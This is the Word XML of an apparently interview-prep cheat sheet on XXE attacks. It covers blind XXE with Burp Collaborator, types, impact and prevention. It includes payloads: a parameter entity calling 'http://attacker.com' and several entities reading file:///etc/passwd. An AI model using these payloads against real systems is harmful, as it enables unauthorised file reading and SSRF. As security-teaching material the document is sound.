    <w:p w14:paraId="2336A049" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Send XML payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFCF77" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B6AB85" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Server processes entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADEFC5E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27844D9C" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Server contacts Collaborator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A21AA3" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE4A532" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Interaction received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A26208" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609791EA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Blind XXE confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5A303" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="0ECB116E">
          <v:rect id="_x0000_i1213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B7E3D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❓</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Q20: What is Parameter Entity XXE lab payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F69CF7" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0690C" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFAEFD7" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "http://attacker.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFED09" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C55B9F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why use it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358A538" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>Used when normal XXE is blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC759F8" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>Helps bypass filters/WAFs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3460D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="1F68570B">
          <v:rect id="_x0000_i1214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10333B17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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 7 Questions (Most Likely in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551"/>
        <w:gridCol w:w="3926"/>
      </w:tblGrid>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="3F1CF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E9715" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B56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5A6BD2B" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B56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8B411D5" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="4E46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C0A9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B5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A0163" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>What is XXE?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A425AE" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Server processes external entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="15E99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E42F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B5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6AD8D5" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Basic payload?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160D43AA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t xml:space="preserve">&lt;!ENTITY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00455B56">
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00455B56">
              <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="26FD3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8871" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B5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0E1F22" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Types of XXE?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31CD2B27" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>In-Band, Blind, Parameter, Billion Laughs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="5E2D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0FFF" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B5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E9264" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Blind XXE?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37B2B742" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>No output → use Burp Collaborator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="28B4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7556" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B5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7B25BA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Impact?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11634756" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>File read, SSRF, DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="6FDE3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081D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56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FDB05EA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Where to find?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="107EE9DB" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>XML APIs, SOAP, file uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="2706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17FE" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B5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92353B" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>How to prevent?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E10D6A0" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Disable external entity processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40BBE92F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="00E00FAD">
          <v:rect id="_x0000_i1215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED8473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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ONE-LINER (Memorize This)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FED11F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"XXE is when XML parser processes external entities, allowing attackers to read files, perform SSRF, or cause DoS. Test by injecting &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;. Prevention: Disable external entity processing in XML parsers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA96595" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="2EC608AF">
          <v:rect id="_x0000_i1216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AADE5F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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Memory Trick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621A2CD" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entity → External → File Read → Fix (Disable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736F6677" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="7E47FB30">
          <v:rect id="_x0000_i1217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BAD4D3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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Interview Tips for XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01836438" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always mention DTD + Entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — shows technical depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A86959" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always give payload example</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> (&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE4D3A" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always mention Burp Collaborator</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> for Blind XXE — shows practical experience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E45A3DD" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always say "Disable external entity processing"</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — shows security best practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AC4C20" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mention 3 types</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> (In-Band, Blind, Billion Laughs) — shows complete knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF11E65" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="2A7C4F12">
          <v:rect id="_x0000_i1218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928006D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Practical Interview Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA54505" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"How do you test XXE?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555882F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"I find XML input (API, file upload, SOAP), add DOCTYPE section, inject entity &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;, use it with &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> and check response. If file content appears → In-Band XXE confirmed. If no output, I use Burp Collaborator payload for Blind XXE. Impact is file read, SSRF, DoS. Prevention is disabling external entity processing."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D933912" w14:textId="4C0CD762" w:rsidR="000C5D98" w:rsidRDefault="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="7DF233B0">
          <v:rect id="_x0000_i1219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p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989"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5E08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B7E5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FA2E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063AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03704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10492"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D1024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F06A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30F22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34942"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3786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00862"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C74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B549F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64D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72E2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFC4F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090911">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1611159631">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="114719007">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1456169674">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="85269816">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1071659989">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="395323417">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="419253799">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1002246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56"/>
    <w:rsid w:val="000C5D98"/>
    <w:rsid w:val="002834BF"/>
    <w:rsid w:val="002B0235"/>
    <w:rsid w:val="00455B56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431B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C7E2C440-3168-4F55-A1AD-CD71F595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56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56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56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56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56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56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56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56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56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45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5B56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5B56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455B56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55B56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455B56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455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56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455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2026-05-25T15:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T15:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>